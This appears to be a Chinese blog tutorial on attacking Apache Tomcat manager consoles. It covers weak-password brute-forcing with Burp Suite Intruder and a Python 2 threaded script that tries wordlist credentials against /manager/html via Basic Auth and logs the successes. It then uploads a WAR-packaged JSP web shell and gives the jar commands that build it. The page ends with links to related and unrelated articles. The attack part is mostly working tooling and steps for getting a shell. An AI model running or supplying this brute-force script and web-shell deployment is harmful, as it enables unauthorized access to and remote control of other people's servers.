1.tomcat 用burpsuit进行弱口令爆破

先抓包





发送到inturder



payload type 选择custom iterater

第一个payload选用户名文件,第二个payload用 : 第三个选密码文件



设置base64加密,和去掉URL编码



开始攻击,得到用户名密码

2.用python脚本进行爆破

目前正在学习python,

#!/usr/bin/env python

# -*- coding: utf-8 -*-

#by.really

import sys

import requests

import threading

import Queue

import time

import base64

import os

#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}

u=Queue.Queue()

p=Queue.Queue()

n=Queue.Queue()

#def urllist()

urls=open('url.txt','r')

def urllist():

    for url in urls:

        url=url.rstrip()

        u.put(url)

def namelist():

    names=open('name.txt','r')

    for name in names:

        name=name.rstrip()

        n.put(name)

def passlist():

    passwds=open('pass.txt','r')

    for passwd in passwds:

        passwd=passwd.rstrip()

        p.put(passwd)

def weakpass(url):

    namelist()

    while not n.empty():

        name =n.get()

        #print name

        passlist()

        while not p.empty():

            good()

            #name = n.get()

            passwd = p.get()

            #print passwd

            headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}

            try:

                r =requests.get(url,headers=headers,timeout=3)

                #print r.status_code

                if r.status_code==200:

                    print '[turn] ' +url+' '+name+':'+passwd

                    f = open('good.txt','a+')

                    f.write(url+' '+name+':'+passwd+'\n')

                    f.close()

                else:

                    print '[false] ' + url+' '+name+':'+passwd

            except:

                print '[false] '  + url+' '+name+':'+passwd

def list():

    while u.empty():

        url = u.get()

        weakpass(name,url)

def thread():

    urllist()

    tsk=[]

    for i in open('url.txt').read().split('\n'):

        i = i + '/manager/html'

        t = threading.Thread(target=weakpass,args=(i,))

        tsk.append(t)

    for t in tsk:

        t.start()

        t.join(1)

        #print "current has %d threads" % (threading.activeCount() - 1)

def good():

    good_ = 0

    for i in open('good.txt').read().split('\n'):

        good_+=1

    os.system('title "weakpass------good:%s"' % (good_))

if __name__=="__main__":

   # alllist()

    thread()

3.getshell

登录成功上传做好的war包,获得shell



成功

4.war包制作

   jar -cf test.war cmd.jsp

   jar -cf shell.war cmd1/*

WEB中间件--tomcat爆破,burp和python脚本的更多相关文章

  1. 常见web中间件漏洞(四)Tomcat漏洞

    这部分好久没写了,继续更新web中间件漏洞思路整理(不复现) ,争取...整理完 前几篇指路链接: nginx: https://www.cnblogs.com/lcxblogs/p/13596239 ...

  2. nginx tomcat 自动部署python脚本【转】

    #!/usr/bin/env python #--coding:utf8-- import sys,subprocess,os,datetime,paramiko,re local_path='/ho ...

  3. Tomcat口令猜解工具【Python脚本】

    Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令. 测试环境:Tomcat版本 7.0 登录界面采用basic认证,Base 64加密一下,模拟 ...

  4. 一句话爆破速度提升一千倍python脚本

    这个脚本是接地提供的思路,一句话爆破速度提升一千倍,看了他的帖子然而没有看到工具,思路很牛逼,我提供一个Python脚本本地测试了下,十万密码只需要3秒,速度还是可以的 # coding:utf-8 ...

  5. linux+php+apache web调用python脚本权限问题解决方案

    lamp : linux + apache + mysql + php 在上篇随笔中linux+php+apache调用python脚本时出现的问题的根本原因是:apache运行时使用的apache用 ...

  6. linux+php+apache web调用python脚本权限问题

    lamp : linux + apache + mysql + php 在近期项目中使用 linux + apache + php调用python脚本是出现以下权限问题: build/bdist.li ...

  7. Web安全测试工具 Burp Suit 使用简介

    参考文档: https://blog.csdn.net/gitchat/article/details/79168613 https://www.cnblogs.com/nieliangcai/p/6 ...

  8. web中间件

    0x00 Web中间件概述 通俗来说,中间件是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通.Apache的Tomcat.IBM公司的WebSphere.BEA公司的WebLogic ...

  9. Web中间件 - 常见漏洞总结

    *文章来源:https://blog.egsec.cn/archives/472 *本文将主要说明:Web中间件常见漏洞的产生原因以及修复方案 什么是Web中间件? 百度百科是这样解释的:中间件是介于 ...

随机推荐

  1. 深度学习之 GAN 进行 mnist 图片的生成

    深度学习之 GAN 进行 mnist 图片的生成 mport numpy as np import os import codecs import torch from PIL import Imag ...

  2. Mego开发文档 - 基础查询

    基础查询 Mego 使用语言集成查询(LINQ)从数据库查询数据.LINQ允许您使用C#(或其他.NET语言)根据派生的上下文和实体类编写强类型查询.将LINQ查询的表示传递给数据库提供者,翻译为数据 ...

  3. GIT入门笔记(15)- 链接到私有GitLab仓库

    GitLab是利用 Ruby on Rails 一个开源的版本管理系统,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目.它拥有与Github类似的功能,能够浏览源代码,管理 ...

  4. mysql 存储过程 实现数据同步

    数据库 表 发生变化,需要把2.0的表数据 同步到3.0库中去: -- 同步数据存储过程执行 -- 更新留言旧表数据到新表数据中 /*DEFINER:Vector*/ drop procedure i ...

  5. 用js来实现那些数据结构(数组篇03)

    终于,这是有关于数组的最后一篇,下一篇会真真切切给大家带来数据结构在js中的实现方式.那么这篇文章还是得啰嗦一下数组的相关知识,因为数组真的太重要了!不要怀疑数组在JS中的重要性与实用性.这篇文章分为 ...

  6. FreeMarker的用法

    freemark就是一个对静态页面上的标签进行动态解析.填充数据的一个框架. 语法(转:http://zhuyuehua.iteye.com/blog/1975251):  1. freemarker ...

  7. hdu1050 Moving Tables---贪心

    题目链接: http://acm.hdu.edu.cn/showproblem.php?pid=1050 题目大意:就说有一些桌子需要从某些房间搬到另一些房间,但中间只有一条走廊,且走廊中任何一段只能 ...

  8. Java面试题—初级(1)

    1.一个".java"源文件中是否可以包括多个类(不是内部类)?有什么限制? 可以有多个类,但只能有一个public的类,并且public的类名必须与文件名相一致. 2.Java有 ...

  9. flask 操作mysql的两种方式-sqlalchemy操作

    flask 操作mysql的两种方式-sqlalchemy操作 二.ORM sqlalchemy操作 #coding=utf-8 # model.py from app import db class ...

  10. JSON定义

    如果我们要在不同的编程语言之间传递对象,就必须把对象序列化为标准格式,比如xml,但更好的方法是序列化为JSON,因为JSON表示出来就是一个字符串,可以被所有语言读取,也可以方便地存储到磁盘或者通过 ...